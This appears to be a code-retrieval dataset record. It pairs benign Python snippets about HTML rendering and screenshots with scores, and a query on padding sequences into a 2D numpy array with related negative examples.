\"<br/>\".join(\n [\n vedo.utils.precision(min_x, 4) + \" ... \" + vedo.utils.precision(max_x, 4)\n for min_x, max_x in zip(self.bounds()[::2], self.bounds()[1::2])\n ]\n )\n\n help_text = \"\"\n if self.name:\n help_text += f\"<b> {self.name}: &nbsp&nbsp</b>\"\n help_text += '<b><a href=\"' + help_url + '\" target=\"_blank\">' + library_name + \"</a></b>\"\n if self.filename:\n dots = \"\"\n if len(self.filename) > 30:\n dots = \"...\"\n help_text += f\"<br/><code><i>({dots}{self.filename[-30:]})</i></code>\"\n\n allt = [\n \"<table>\",\n \"<tr>\",\n \"<td>\",\n image,\n \"</td>\",\n \"<td style='text-align: center; vertical-align: center;'><br/>\",\n help_text,\n \"<table>\",\n \"<tr><td><b> nr. of objects </b></td><td>\"\n + str(self.GetNumberOfPaths())\n + \"</td></tr>\",\n \"<tr><td><b> position </b></td><td>\" + str(self.GetPosition()) + \"</td></tr>\",\n \"<tr><td><b> diagonal size </b></td><td>\"\n + vedo.utils.precision(self.diagonal_size(), 5)\n + \"</td></tr>\",\n \"<tr><td><b> bounds </b> <br/> (x/y/z) </td><td>\" + str(bounds) + \"</td></tr>\",\n \"</table>\",\n \"</table>\",\n ]\n return \"\\n\".join(allt)", "def camera():\n return render_template('home/cam.html')", "def test_html_output(self):\n pass", "def _repr_html_(self):\n\n import numpy as np\n import matplotlib.pyplot as plt\n from .._tier9 import imshow\n\n\n size_in_pixels = np.prod(self.shape)\n size_in_bytes = size_in_pixels * self.dtype.itemsize\n\n labels = (self.dtype == np.uint32)\n\n # In case the image is 2D, 3D and larger than 100 pixels, turn on fancy view\n if len(self.shape) in (2, 3) and size_in_pixels >= 100:\n import matplotlib.pyplot as plt\n imshow(self,\n labels=labels,\n continue_drawing=True,\n colorbar=not labels)\n image = self._png_to_html(self._plt_to_png())\n else:\n return \"<pre>cle.array(\" + str(np.asarray(self)) + \", dtype=\" + str(self.dtype) + \")</pre>\"\n\n\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n if size_in_bytes > 1024:\n size_in_bytes = size_in_bytes / 1024\n size = \"{:.1f}\".format(size_in_bytes) + \" GB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" MB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" kB\"\n else:\n size = \"{:.1f}\".format(size_in_bytes) + \" B\"\n\n histogram = \"\"\n\n if size_in_bytes < 100 * 1024 * 1024:\n if not labels:\n\n import numpy as np\n from .._tier2 import minimum_of_all_pixels, maximum_of_all_pixels\n from .._tier3 import histogram\n\n num_bins = 32\n\n h = np.asarray(histogram(self, num_bins=num_bins))\n\n plt.figure(figsize=(1.8, 1.2))\n plt.bar(range(0, len(h)), h)\n\n # hide axis text\n # https://stackoverflow.com/questions/2176424/hiding-axis-text-in-matplotlib-plots\n # https://pythonguides.com/matplotlib-remove-tick-labels\n frame1 = plt.gca()\n frame1.axes.xaxis.set_ticklabels([])\n frame1.axes.yaxis.set_ticklabels([])\n plt.tick_params(left=False, bottom=False)\n\n histogram = self._png_to_html(self._plt_to_png())\n\n min_max = \"<tr><td>min</td><td>\" + str(self.min()) + \"</td></tr>\" + \\\n \"<tr><td>max</td><td>\" + str(self.max()) + \"</td></tr>\"\n\n else:\n\n min_max = \"\"\n\n all = [\n \"<table>\",\n \"<tr>\",\n \"<td>\",\n image,\n \"</td>\",\n \"<td style=\\\"text-align: center; vertical-align: top;\\\">\",\n \"<b><a href=\\\"https://github.com/clEsperanto/pyclesperanto_prototype\\\" target=\\\"_blank\\\">cle._</a> image</b><br/>\",\n \"<table>\",\n \"<tr><td>shape</td><td>\" + str(self.shape).replace(\" \", \"&nbsp;\") + \"</td></tr>\",\n \"<tr><td>dtype</td><td>\" + str(self.dtype) + \"</td></tr>\",\n \"<tr><td>size</td><td>\" + size + \"</td></tr>\",\n min_max,\n \"</table>\",\n histogram,\n \"</td>\",\n \"</tr>\",\n \"</table>\",\n ]\n\n return \"\\n\".join(all)", "def html_page():\n return render_template('Map_twitter.html')", "def grabScreenshot(self):\n\n self.griddButton.setVisible(True)\n self.mirrorButton.setVisible(True)\n self.blurButton.setVisible(True)\n self.display1Button.setVisible(True)\n self.display2Button.setVisible(True)\n self.tutorialLabel.setVisible(False)\n\n print (\"Grabbing Screenshot\")\n print (\"Showing Buttons now\")\n\n with mss() as sct:\n monitor = sct.monitors[1]\n sct_img = sct.grab(monitor)\n # Convert to PIL/Pillow Image\n screenshots = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX')\n screenshots.save(self.firstScreen, \"PNG\")\n\n # 2nd Display Screen shot\n\n monitor = sct.monitors[2]\n sct_img = sct.grab(monitor)\n # Convert to PIL/Pillow Image\n screenshots = Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX')\n screenshots.save(self.secondScreen, \"PNG\")\n self.photo.setPixmap(QtGui.QPixmap(self.firstScreen))\n self.statustext.setText(\"Added display 1 as work display for now\")\n self.ActivePhoto = \"Screenshot1.png\" # Set Photo as display 1 so we dont get callstack error when mirrroring", "def display(self):\n # this is so that each turtle gets their own canvas. Without this they all try to draw to the first created canvas\n self._randHash = random.getrandbits(128)\n \n # The actual forum seems to be able to display only one of the html texts, so merge them and send them all in one go\n htmlString = \"\";\n ## Canvas creation\n htmlString += ('<script type=\"text/javascript\">%s</script>'%ReadFile('paper.js')) + \"\\n\"\n htmlString += ('<canvas id=\"canv%s\" width=%spx height=%spx></canvas>'%(self._randHash, self._canvWidth, self._canvHeight)) + \"\\n\"\n \n \n # prepare data for injection\n self._arrayString = \"[\"\n for act in self._actions:\n self._arrayString += '[%s, %s, %s, %s, %s, %s, \"%s\", %s, \"%s\", \"%s\"], ' \\\n % (act[0], act[1], act[2], act[3], act[4], act[5], act[6], act[7], act[8], act[9])\n self._arrayString += \"]\"\n \n # inject data\n htmlString += ('<script type=\"text/javascript\">var actionData = %s; var levelData = %s;</script>'% (self._arrayString, self._levelDataString)) + \"\\n\"\n #print(self._levelDataString)\n \n ## Drawing the turtle\n htmlString += ('<script type=\"text/paperscript\" canvas=\"canv%s\">%s</script>'% (self._randHash, ReadFile('AtahansTurtle.js')))\n htmlString = htmlString.replace(\"actionData\", \"actionData\" + str(self._randHash));\n htmlString = htmlString.replace(\"levelData\", \"levelData\" + str(self._randHash));\n #print(htmlString);\n display(HTML(htmlString))", "def create_screenshot(driver: webdriver.Chrome, name: str):\n\n driver.save_screenshot(f\".\\\\{name}_{time.strftime('%d-%m_%H-%M-%S')}.png\")", "def create_screen(self, width, height):", "def generateRender(self, **options):\r\n\r\n path = options.get('path', '')\r\n resolution = options.get(\r\n 'resolution', QSize(mxs.renderWidth, mxs.renderHeight))\r\n pixelAspect = options.get('pixelAspect', 1.0)\r\n step = options.get('step', 1)\r\n frameRange = options.get('frameRange', [])\r\n missingFramesOnly = options.get('missingFramesOnly', False)\r\n\r\n if path:\r\n basePath = os.path.split(path)[0]\r\n if not os.path.exists(basePath):\r\n os.makedirs(basePath)\r\n\r\n if frameRange:\r\n bitmap = mxs.render(outputFile=path, fromFrame=frameRange[0], toFrame=frameRange[\r\n 1], camera=self._nativePointer, nthFrame=step, outputWidth=resolution.width(), outputHeight=resolution.height(), pixelAspect=pixelAspect)\r\n mxs.undisplay(bitmap)\r\n else:\r\n bitmap = mxs.render(outputFile=path, frame=mxs.pyHelper.namify(\r\n 'current'), camera=self._nativePointer, outputWidth=resolution.width(), outputHeight=resolution.height(), pixelAspect=pixelAspect)", "def call(self, **kwargs):\n # Format template\n template = self._cw.vreg.template_env.get_template(\"startup.logged.jinja2\")\n html = template.render(\n header_url=self._cw.data_url(\"creative/img/neurospin.jpg\"),\n moderator=False)\n self.w(html)", "def get(self):\n self.response.out.write(blobstore.create_upload_url(\n UPLOAD_SCREENSHOT_IMAGE_URL))", "def render(self):\n\n self.desert_image.render()\n self.cannon_image.render()\n self.play_button.render()\n self.escape_label.render()", "def output_to_html(string_data):\n raise NotImplementedError(\"This function is not yet Implemented!\")", "async def _take_screenshot(self, page: Page) -> None:\r\n page_id = self.pages[page]['id']\r\n # remove this page's old screenshot.\r\n for f in self.screenshot_dir.glob(f'*{page_id}.jpeg'):\r\n f.unlink()\r\n # take new screenshot.\r\n # quality=0 uses less CPU and still provides a pretty clear image.\r\n await page.screenshot(path=str(self.screenshot_dir.joinpath(\r\n f\"{datetime.now().strftime('%Y-%m-%d_%H:%M:%S')}_{page}.jpeg\")), quality=0)", "def create_html_snapshot_widget(ws_names2id: Dict[str, str], ws_paths: Dict[str, WorkspacePaths], output):\n workspace_chooser = widgets.Dropdown(\n options=ws_names2id,\n value=None,\n description='<b>Choose the workspace</b>:',\n style={'description_width': 'initial'},\n layout=widgets.Layout(width='900px')\n )\n notebook_chooser = widgets.SelectMultiple(\n options=[], # This will be populated after a workspace is chosen.\n value=[],\n description='<b>Choose one or more notebooks for which to create an HTML snapshot:</b>',\n style={'description_width': 'initial'},\n layout=widgets.Layout(width='900px')\n )\n commenter = widgets.Textarea(\n value='',\n placeholder='Type a comment here about this HTML snapshot of your notebook',\n description='<b>Comment</b>:',\n disabled=False,\n layout=widgets.Layout(width='900px', height='50px'),\n style={'description_width': 'initial'}\n )\n submit_button = widgets.Button(\n description='Submit',\n disabled=False,\n button_style='success',\n tooltip='Click the submit button to create the HTML snapshot.'\n )\n\n def on_button_clicked(_):\n with output:\n output.clear_output()\n if workspace_chooser.value is None:\n display(HTML('''<div class=\"alert alert-block alert-danger\">\n No workspace was selected. To create an HTML snapshot of a notebook, select the desired workspace.</div>'''))\n return\n workspace_paths = ws_paths[workspace_chooser.value]\n display(create_html_snapshot(notebook_paths=notebook_chooser.value,\n comment=commenter.value,\n workspace_paths=workspace_paths))\n submit_button.on_click(on_button_clicked)\n\n def on_choose_workspace(changed):\n output.clear_output()\n workspace_paths = ws_paths[changed['new']]\n workspace_notebooks = tf.io.gfile.glob(pattern=workspace_paths.get_notebook_file_glob())\n notebook_chooser.options = {os.path.basename(nb): nb for nb in workspace_notebooks}\n workspace_chooser.observe(on_choose_workspace, names='value')\n\n return widgets.VBox(\n [widgets.HTML('''\n <h3>Create an HTML snapshot of a notebook</h3>\n <p>Use this when you want to save an HTML snapshot of a notebook containing its outputs. The notebook will be rendered to HTML as-is (not re-run).\n <br>It will be saved in the <code>reports</code> folder of the workspace bucket:\n <br><ul>\n <li><code>gs://&lt;workspace bucket name&gt;/reports/&lt;your email address&gt;/&lt;date&gt;/&lt;time&gt;/&lt;notebook&gt;.html</code></li>\n <li><code>gs://&lt;workspace bucket name&gt;/reports/&lt;your email address&gt;/&lt;date&gt;/&lt;time&gt;/&lt;notebook&gt;.comment.txt</code></li>\n </ul>\n </p><hr>\n '''),\n workspace_chooser, notebook_chooser, commenter, submit_button],\n layout=widgets.Layout(width='auto', border='solid 1px grey'))", "def run(self) -> None:\n self._render()\n print(self.sio.getvalue())", "def plot_html(lats, lons, zoom=11, heatmap=True, scatter=True):\n gmap = gmplot.GoogleMapPlotter(np.median(lats), np.median(lons), zoom=zoom)\n \n if heatmap: gmap.heatmap(lats, lons)\n if scatter: gmap.scatter(lats, lons, 'k', size=6, marker=False)\n gmap.draw(\"/Users/ulfaslak/Desktop/mymap.html\")", "def create_html(html_filename, pulse_train):\n\n with open(html_filename, 'w') as html:\n html_open = \\\n \"\"\"\n <!DOCTYPE html>\n <html>\n <head>\n <title>Page Title</title>\n </head>\n <body>\n \n <img onclick=\"vibrate();\" src=\"https://pbs.twimg.com/media/CojtXEVWgAAAL1_.jpg\">\n \n </body>\n\n <script>\n\n function vibrate(){\n \"\"\"\n\n html_script = \"navigator.vibrate({});\".format(pulse_train)\n\n html_close = \\\n \"\"\"\n console.log(\"VIBRATE\");\n }\n </script>\n </html>\n \"\"\"\n html.write(html_open)\n html.write(html_script)\n html.write(html_close)", "def call(self, **kwargs):\n # Format template\n template = self._cw.vreg.template_env.get_template(\"startup.logged.jinja2\")\n html = template.render(\n header_url=self._cw.data_url(\"creative/img/neurospin.jpg\"),\n moderator=True)\n self.w(html)", "def export_html(self):\n self._svg_warning_displayed = False\n super(RichJupyterWidget, self).export_html()", "def show_browser(self) -> None:\n\n # set delete = False to avoid early delete when user open multiple plots.\n with NamedTemporaryFile(suffix=\".html\", delete=False) as tmpf:\n pass\n with open(tmpf.name, \"w\") as file:\n file.write(self.template_base.render(context=self.context))\n webbrowser.open_new_tab(f\"file://{tmpf.name}\")", "def embed_image_html(imgBGR, target_width=TARGET_WIDTH, target_height=TARGET_HEIGHT):\n import cv2\n from PIL import Image\n if target_width is not None:\n imgBGR = _resize(imgBGR, t_width=target_width)\n elif target_width is not None:\n imgBGR = _resize(imgBGR, t_height=target_height)\n imgRGB = cv2.cvtColor(imgBGR, cv2.COLOR_BGR2RGB)\n pil_img = Image.fromarray(imgRGB)\n string_buf = StringIO()\n pil_img.save(string_buf, format='jpeg')\n data = string_buf.getvalue().encode('base64').replace('\\n', '')\n return 'data:image/jpeg;base64,' + data", "def render_html(title, text, is_test=False):\n template = open(resolve(\"html/page.mustache\")).read()\n return pystache.render(template, {'title': title, 'content': text,\n 'app_title': DISPLAY_NAME,\n 'context': CONTEXT,\n 'is_test': is_test})", "async def puppeteer_screenshot(archive_id, url_id, date, url, pics_out_path, timeout_duration):\n\n browser = await launch()\n page = await browser.newPage()\n await page.setViewport({'height': 768, 'width': 1024})\n await page.goto(url, timeout=(int(timeout_duration) * 1000))\n await page.screenshot(path='{0}{1}.{2}.{3}.png'.format(pics_out_path, archive_id, url_id, date))\n await browser.close()", "def view_log():\n g.title = \"View Log\"\n log = ShotLog().get_text() #log is a generator\n \n return render_template('log_viewer.html',log=log)", "def embed_image_html(image, type):\n if type == 'dehaze':\n image_pil = Image.fromarray((image).astype('uint8'))\n elif type == 'style_transfer':\n image_pil = Image.fromarray((image).astype('uint8'))\n else:\n image_pil = Image.fromarray((255 * image).astype('uint8'))\n if sys.version_info.major == 2:\n string_buf=StringIO.StringIO()\n image_pil.save(string_buf, format='png')\n data = string_buf.getvalue().encode('base64').replace('\\n', '')\n else:\n _buf = BytesIO()\n image_pil.save(_buf, format='png')\n _buf.seek(0)\n b64_buf = base64.b64encode(_buf.getvalue())\n string_buf = StringIO(b64_buf.decode('utf-8', errors='replace'))\n data =string_buf.getvalue().replace('\\n', '')\n\n return 'data:image/png;base64,' + data", "def get_html(self):\n\n # these 3 will be used in class methods\n self.html_id = self.location.html_id()\n self.html_class = self.location.category\n self.configuration_json = self.build_configuration_json()\n params = {\n 'gst_html': self.substitute_controls(self.render),\n 'element_id': self.html_id,\n 'element_class': self.html_class,\n 'configuration_json': self.configuration_json\n }\n content = self.system.render_template(\n 'graphical_slider_tool.html', params)\n return content", "def make_html(depends=(files['image.gif'],),\n targets=(files['index.html'],)):\n\n index_html = open(files['index.html'].rel, 'w')\n index_html.write(pyyaks.context.render(html_template))\n index_html.close()", "def _repr_html_(self): # pragma: no cover\n return Utils.render_html('extent.html', extent=self)", "def screenshot_vfb(url, **args):\n size = args.pop('size', (1024, 768))\n vfb = Xvfb(display_spec='%dx%dx24' % size)\n if not vfb.display:\n print 'Error creating display'\n return None\n print 'Xvfb: %d %s' % (vfb.proc.pid, vfb.display)\n try:\n return screenshot(url, **args)\n finally:\n print 'Terminate vfb %d' % vfb.proc.pid\n vfb.close()", "def make_page(keyword, html):\n output = []\n addline = output.append\n\n addline('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">')\n addline('<html>')\n addline('<head>')\n addline('<title>Tweets for #%s</title>' % (keyword))\n addline('<style type=\"text/css\">')\n addline('div.tweet_container { float: right; width: 400px; font-size: 0.8em; border: 2px solid darkblue; padding: 8px; height: 80%; overflow-y: scroll; }')\n addline('div.tweet_container h3 { margin: 0; padding: 0; text-align: center; color: darkblue; margin-bottom: 6px; padding-bottom: 6px; border-bottom: 2px solid darkblue; }')\n addline('div.tweet { clear: both; }')\n addline('div.tweetphoto { float:left; width: auto; margin: 0; padding: 0; }')\n addline('div.tweetphoto img { border: none; width: 48px; height: 48px; display: block; margin: 0; margin-bottom: 24px; margin-right: 8px; padding: 0; }')\n addline('div.tweetphoto a > img { border: 1px solid black; }')\n addline('</style>')\n addline('</head>')\n addline('<body>')\n\n addline(html)\n\n addline('</div>')\n addline('</body>')\n addline('</html>')\n return '\\n'.join(output)", "def _ScreenshotCmd(self, file_path):\n return [self._SCREENSHOT_BINARY, '-f', file_path]", "def get_html(self):\r\n\r\n # these 3 will be used in class methods\r\n self.html_id = self.location.html_id()\r\n self.html_class = self.location.category\r\n\r\n self.configuration_json = self.build_configuration_json()\r\n params = {\r\n 'gst_html': self.substitute_controls(self.render),\r\n 'element_id': self.html_id,\r\n 'element_class': self.html_class,\r\n 'configuration_json': self.configuration_json\r\n }\r\n content = self.system.render_template(\r\n 'graphical_slider_tool.html', params\r\n )\r\n return content", "def display(self):\n display(self.image)", "def TakeScreenshot(self, file_path):\n # When running remotely, taking a screenshot to the specified |file_path|\n # may fail due to differences between the device and host. We also want\n # to save a copy to /var/log/ on the device, as it is saved by CrOS bots.\n # Address both by taking the screenshot to /var/log/ and either copying\n # to the correct location in local mode or pulling to the correct location\n # in remote mode.\n basename = os.path.basename(file_path)\n var_path = '/var/log/screenshots/%s' % basename\n dir_name = os.path.dirname(file_path)\n self.RunCmdOnDevice(['mkdir', '-p', '/var/log/screenshots'])\n stdout, stderr = self.RunCmdOnDevice(['/usr/local/sbin/screenshot',\n var_path,\n '&&',\n 'echo',\n 'screenshot return value:$?'])\n if self.local:\n self.RunCmdOnDevice(['mkdir', '-p', dir_name])\n self.RunCmdOnDevice(['cp', var_path, file_path])\n else:\n try:\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n self.GetFile(var_path, file_path)\n except OSError as e:\n logging.error('Unable to pull screenshot file %s to %s: %s',\n var_path, file_path, e)\n logging.error('Screenshot capture output: %s\\n%s', stdout, stderr)\n return 'screenshot return value:0' in stdout", "def render(self, mode='human'):", "def _render(self):\n self.dirty = False\n self.image = self.font.render(self._text, self.aa, self.color_fg)\n self.rect = self.image.get_rect()", "def render_browser_script(scene, sig=None, *, filename=None,\n default_color=Color.DEFAULT, default_static=False, **kwargs):\n html_code = generate_full_html(\n scene, sig=sig, default_color=default_color, default_static=default_static, **kwargs)\n if filename is None:\n hash_object = hashlib.md5(html_code.encode())\n filename = hash_object.hexdigest() + '.html'\n with open(filename, 'w', encoding='utf8') as fo:\n print(html_code,file=fo)\n webbrowser.open(filename)", "def screen_shot(self):\n screen_size = '{}x{}@{}x{}/0'.format(self.screen[0], self.screen[1], self.screen[0], self.screen[1])\n subprocess.check_call([\n ADB_EXECUTOR, '-s', self.device_id, 'shell',\n 'LD_LIBRARY_PATH=/data/local/tmp', '/data/local/tmp/minicap', '-s', '-P', screen_size,\n '>', TEMP_PIC_ANDROID_PATH\n ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n logger.info('screen shot saved in {}'.format(TEMP_PIC_ANDROID_PATH))", "def screenshot(self, path=getcwd(), name=\"screenshot.png\", element=None):\n\t\tp = path +\"/\"+name\n\t\tif element is not None:\n\t\t\ttry:\n\t\t\t\tassert(type(element)) == webdriver.firefox.webelement.FirefoxWebElement\n\t\t\t\telement.save_screenshot(p)\n\t\t\t\treturn 0\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"Unable to save screenshot using given element\\n{}\".format(e))\n\t\t\t\treturn -1\n\t\tself.driver.save_screenshot(p)\n\t\treturn 0", "def capture_screenshot_for_step(step, when):\r\n if world.auto_capture_screenshots:\r\n scenario_num = step.scenario.feature.scenarios.index(step.scenario) + 1\r\n step_num = step.scenario.steps.index(step) + 1\r\n step_func_name = step.defined_at.function.func_name\r\n image_name = \"{prefix:03d}__{num:03d}__{name}__{postfix}\".format(\r\n prefix=scenario_num,\r\n num=step_num,\r\n name=step_func_name,\r\n postfix=when\r\n )\r\n world.capture_screenshot(image_name)", "def screenshot_log(level, message, screenshot_file):\n with open(screenshot_file, \"rb\") as image_file:\n file_data = image_file.read()\n item_log(level, message, {\"name\": screenshot_file.split(os.path.sep)[-1],\n \"data\": file_data,\n \"mime\": \"image/png\"})" ]
[ "0.6781203", "0.67746735", "0.6765626", "0.6692511", "0.6436723", "0.62806684", "0.62287426", "0.62287426", "0.6214485", "0.61541307", "0.6063398", "0.6000311", "0.5993428", "0.59772694", "0.59754765", "0.5933216", "0.59321904", "0.58835065", "0.5881337", "0.5876187", "0.5874557", "0.5847862", "0.5822839", "0.5818481", "0.5810587", "0.58024925", "0.58013743", "0.5793616", "0.5783022", "0.57813567", "0.57791847", "0.57709813", "0.5768524", "0.5751391", "0.5716658", "0.5708282", "0.5707206", "0.5701", "0.5698449", "0.5689132", "0.56837463", "0.5657982", "0.56494135", "0.56466097", "0.56445926", "0.5643945", "0.56406665", "0.5637489", "0.5632606", "0.56323737", "0.56276804", "0.5621493", "0.55876267", "0.5586509", "0.55860436", "0.5581289", "0.55618954", "0.55598295", "0.55595297", "0.55575097", "0.5521625", "0.55215526", "0.5511708", "0.5507683", "0.5503391", "0.5498968", "0.54933244", "0.5477815", "0.54664236", "0.5464901", "0.5463216", "0.54597837", "0.54537356", "0.5450437", "0.54463035", "0.5445723", "0.5445119", "0.5408654", "0.5400887", "0.5399566", "0.53884935", "0.5383568", "0.5378658", "0.53782856", "0.53729814", "0.537123", "0.53707117", "0.53698564", "0.5368437", "0.53683877", "0.5359189", "0.5356138", "0.53528196", "0.53506786", "0.5348461", "0.5346261", "0.5342142", "0.5335547", "0.5333839", "0.53325856" ]
0.6651713
4
Transform incoming data to a homogeneous 2d array.
def transform(self, X): shape = len(X), self.max_len Xt = self.pad_value * np.ones(shape, dtype=self.dtype) for i, arr in enumerate(X): m = min(self.max_len, len(arr)) if not m: continue arr = np.array(arr[:m]) Xt[i, :m] = arr return Xt
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process(self, data):\n data = np.atleast_2d(data)\n\n if self.orientation == 'row':\n return data\n else:\n return data.T", "def _to_numpy_ndarray(cls, data):\n if isinstance(data, np.ndarray):\n return data\n arr = np.array(data, dtype=np.float)\n if len(arr.shape) == 1:\n arr = np.reshape(arr, newshape=(1, arr.shape[0]))\n return arr", "def to_2d_array(self):\n return reshape_fns.to_2d(self._obj, raw=True)", "def config_to_array(data):\n return np.array(data[\"data\"]).reshape(data[\"rows\"], data[\"cols\"])", "def flat_to_2d(data, det_width):\n return data.reshape((data.shape[0], data.shape[1], det_width, det_width))", "def transform(self, x: Array2D) -> Array2D:", "def make_2d(x):\n return x.reshape((1, len(x)))", "def _handle_input_data(data):\n data = np.asarray(data)\n if np.ndim(data) == 1:\n d_rows = 1\n d_cols = len(data)\n data = data.reshape((1, data.shape[0]))\n elif np.ndim(data) == 2:\n d_rows = data.shape[0]\n d_cols = data.shape[1]\n else:\n raise ValueError(\"Incorrect dimensionality of data. Must be <= 2\")\n return data, d_rows, d_cols", "def _to_ndarray(data):\n return np.atleast_1d(getattr(data, 'values', data))", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def to_2dnp_array(X):\r\n if isinstance(X, np.ndarray):\r\n if X.ndim == 1:\r\n return X.reshape((-1, 1))\r\n if X.ndim == 2:\r\n return X\r\n if isinstance(X, Number):\r\n X = [X]\r\n X = np.array(X)\r\n X = X.reshape([-1, np.prod(X.shape) // X.shape[0]])\r\n return X", "def ndarray(self):\n if self._coord_format != constants.MatrixCoordinateDefault:\n self._logger.error(\"invalid coordinate format\")\n raise NotImplementedError(\"invalid coordinate format\")\n\n data = self.clear().data.collect()\n\n result = np.zeros(self._shape, dtype=self._dtype)\n\n for e in data:\n result[e[0], e[1]] = e[2]\n\n return result", "def _to_arraylike(data):\n _load_objects()\n if data is None:\n raise ValueError('Cannot convert None data.')\n return None\n if not isinstance(data, (ndarray, DataArray, DataFrame, Series, Index)):\n data = np.asarray(data)\n if not np.iterable(data):\n data = np.atleast_1d(data)\n return data", "def dataConvertToNumpy( self ):\n self.featureNumpy = np.asarray( self.feature )\n self.ClassNumpy = np.asarray( self.Class )", "def getArray2d(self):\n\t\treturn self.array2d", "def __array__(self):\n return np.asarray(self.data)", "def augment_data(self,data):\n d = np.empty([data.shape[0]+2,data.shape[1]+2])\n d[1:-1,1:-1] = data\n d[0,1:-1] = data[0,:]\n d[1:-1,0] = data[:,0]\n d[-1,1:-1] = data[-1,:]\n d[1:-1,-1] = data[:,-1]\n d[0,0] = data[0,0]\n d[-1,-1] = data[-1,-1]\n d[0,-1] = data[0,-1]\n d[-1,0] = data[-1,0]\n return d", "def _process(self, data: np.ndarray) -> np.ndarray:", "def _process(self, data: np.ndarray) -> np.ndarray:", "def to_numpy(data):\n fields = [\n \"x\", \"y\", \"z\",\n \"proximity\"\n ]\n return np.array([[row[field] for field in fields] for row in data])", "def transform(self, data):\n unflattened = [unflatten_vec(d) for d in data]\n return numpy.array([self.signature(uf)\n for uf in unflattened])", "def data():\n return RaggedArray(\n [[0, 1], [1, 2, 3, 4], [], [-1, -2], []]*20, dtype='float64')", "def data_reshape(image):\n image_mat = []\n if image.shape[-1] == 3:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j[0], j[1], j[2]])\n else:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j])\n return np.array(image_mat)", "def to_fits_array(self):\n return self.data", "def image_to_array(self, img):\n x = np.asarray(img, dtype=self.dtype)\n if len(x.shape) == 3:\n if self.channels_first:\n x = x.transpose(2, 0, 1)\n elif len(x.shape) == 2:\n if self.channels_first:\n x = x.reshape((1, x.shape[0], x.shape[1]))\n else:\n x = x.reshape((x.shape[0], x.shape[1], 1))\n else:\n raise ValueError('Unsupported image shape: ', x.shape)\n return x", "def m2n(buf, shape, typecode, ismatrix=False):\n a = np.frombuffer(buf, dtype=typecode).reshape(shape)\n if ismatrix: a = np.asmatrix(a)\n return a", "def processing_data(raw_data):\n data = np.frombuffer(raw_data, np.uint8)\n data = np.reshape(data, [data.shape[0]//1029, -1])\n data = data[:, 5:]\n data = np.reshape(data, [1, -1])\n data = 256 * data[0, 0::2] + data[0, 1::2]\n data = 10 * (data / 65535)\n data = np.reshape(data, [-1, 8]).T\n return data", "def flatten_data(data):\r\n result = []\r\n for mesurements in data:\r\n result.append(mesurements.flatten())\r\n return np.array(result)", "def to_array(self):\n return np.array(self.to_image())", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def make_data(self, data):\n return array(data, dtype=float32)", "def _convert_to_array(stream):\n if not isinstance(stream, Stream):\n raise TypeError('Input object should be an obspy stream.')\n\n nt = len(stream.traces[0].data)\n nr = len(stream)\n output = np.zeros((nt, nr))\n\n #hey, this is pretty much what's in Stream: turple list, (number, trace) \n #trace has the attribute of data. The data can be regarded to a column of data. \n for i, trace in enumerate(stream):\n output[:, i] = trace.data[:]\n\n return output", "def to_numpy(x):\r\n return x.squeeze().detach().cpu().numpy()", "def _read_data(self):\n return [np.array([]), np.array([])]", "def make_homogeneous(self, points: np.ndarray) -> np.ndarray:\r\n return np.hstack((points[:, 0], np.ones(points.shape[0]).reshape(-1, 1),))", "def prepare_data(data):\n\n image_array = np.zeros(shape=(len(data), 48, 48))\n image_label = np.array(list(map(int, data['emotion'])))\n\n for i, row in enumerate(data.index):\n image = np.fromstring(data.loc[row, 'pixels'], dtype=int, sep=' ')\n image = np.reshape(image, (48, 48))\n\n image = face_detection(image.astype(np.uint8))\n\n image_array[i] = image\n\n return image_array, image_label", "def get_data():\n data = [np.array([32.,595.]),\n np.array([30.,599.]),\n np.array([18.,622.]),\n np.array([51.,606.]),\n np.array([38.,578.])]\n return data", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_circs = 0\n self._n_shots = 0\n self._n_slots = 0\n self._n_iq = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError:\n try:\n # level1 data averaged over shots\n self._n_circs, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"Data given to {self.__class__.__name__} is not likely level1 data.\"\n ) from ex\n\n if self._validate:\n if self._n_iq != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} does not have two-dimensions \"\n f\"(I and Q). Instead, {self._n_iq} dimensions were found.\"\n )\n\n return data", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 0] * self.scale", "def atleast_2d(x):\n return np.atleast_2d(x).T if x.ndim < 2 else x", "def _prepare_data(self, coords):\n return np.array([coords])", "def data_for_grouping():\n return RaggedArray(\n [[1, 0], [1, 0], [], [], [0, 0], [0, 0], [1, 0], [2, 0]])", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_shots = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"The data given to {self.__class__.__name__} does not have the shape of \"\n \"single-shot IQ data; expecting a 4D array.\"\n ) from ex\n\n if self._validate:\n if data.shape[-1] != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} must be a multi-dimensional array\"\n \"of dimension [d0, d1, ..., 2] in which the last dimension \"\n 